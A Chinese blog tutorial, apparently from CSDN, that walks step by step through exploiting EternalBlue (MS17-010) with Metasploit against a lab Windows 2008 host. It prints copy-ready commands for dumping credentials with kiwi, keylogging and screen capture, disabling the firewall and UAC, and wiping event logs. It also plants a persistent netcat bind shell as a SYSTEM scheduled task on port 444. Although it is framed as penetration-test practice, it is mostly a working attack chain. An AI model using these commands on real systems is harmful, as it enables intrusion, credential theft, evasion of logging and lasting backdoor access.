永恒之蓝漏洞利用篇

目录

漏洞扫描

漏洞利用

 后渗透阶段

持久性后门

验证


没有更新的日子 小主在忙着制作项目 所以就耽搁了几天 话不多说 开始介绍这个很强大的漏洞:永恒之蓝

什么是永恒之蓝:

永恒之蓝:通过TCP的445和139端口,利用SMB远程代码执行漏洞,攻击者可以在目标系统上执行任意代码

漏洞扫描

这里推荐的工具是openvas 和 nessus (小主用的是openvas)

漏洞利用

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection                                                         
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

// eternalblue攻击脚本, scanner检测脚本 

msf6 > use 0  
//使用 0 模块(前面对应的编号)
msf6 > set rhosts 192.168.10.142 
//这里填写靶机的IP地址
msf6 > run
//运行

 后渗透阶段

获取密码 获取屏幕

meterpreter > load kiwi      //加载kiwi模块

meterpreter > creds_all      //检测所有凭证,该命令可以列举系统中的明文密码       

meterpreter > screenshot     //屏幕截图

meterpreter > screenshare    //屏幕共享

meterpreter > run post/windows/capture/keylog_recorder  //开启键盘记录后渗透脚本

提权操作

meterpreter > ps                 //查看进程列表

meterpreter > getpid             //查看自己的PID

meterpreter > ps -S explorer     //查找explorer进程(用户权限大、不易被结束)

meterpreter > migrate  2652      //迁移进程到explorer,稳定,隐蔽,权限高

meterpreter > getuid             //具有administrator身份

防火墙配置

meterpreter > shell  //获取shell权限

C:\Windows\system32> chcp  65001          //消除乱码

C:\Windows\system32> netsh  advfirewall  set  allprofiles  state  off 

C:\Windows\system32> netsh  advfirewall  set  allprofiles  state  on
//开启高级防火墙的所有的profiles设置

C:\Windows\system32> netsh firewall add portopening tcp 444 backdoor enable all
                           防火墙    添加 开启端口     协议 端口 名字     启用

关闭uac

c:\windows\system> 
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

//这条命令比较长  建议各位友友直接复制粘贴

   在 meterpreter 下清除日志(渗透测试下这步操作就省略)

c:\windows\system> exit                         // 退出win2008 cmd命令行终端
meterpreter > clearev                          //擦除windows 事件查看器

持久性后门

meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32  //上传nc到目标主机

meterpreter > ls nc.exe                  //查看上传结果及权限

100777/rwxrwxrwx  59392  fil  2023-03-09 17:25:27 +0800  nc.exe

(权限不够就赋予权限)

注册表开机自启

meterpreter > shell                     //进入命令提示符

C:\Windows\system32>chcp 65001          //消除乱码
chcp 65001


C:\Windows\system32>
schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" /sc onstart

         创建     指定名称  执行的用户   指定运行程序的位置                 开启端口号             
开机时执行

schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" 
/sc onstart

SUCCESS: The scheduled task "nc" has successfully been created.       //设置开机自启计划任务
C:\Windows\system32>


schtasks:scheduled tasks 计划任务
/create:创建
/tn: task name 任务名称
/ru:run name 运行用户
system:系统用户
/tr:task run 任务执行的操作
-Ldp:Listen and port 监听 端口
-e:execute 执行
/sc:schedule 计划任务 表示计划任务触发的时机
onstart:开机

整个命令含义 
schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" 
/sc onstart

表示:
使用计划任务(schtasks)实用程序创建一个名为"nc"的新任务,
以系统权限运行,在系统启动时执行,并执行位于"c:\windows\system32\nc.exe"的"netcat"程序,
监听端口444并在接收到连接时执行命令提示符。

验证

重启win2008 

C:\Users\Administrator> netstat -an     //查找444端口

ctrl + shift + Esc打开任务管理器,在进程中查看有没有nc.exe


[root@kali ~] nc 192.168.10.142 444
C:\Windows\system32>                           //成功进入到目标主机命令行

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值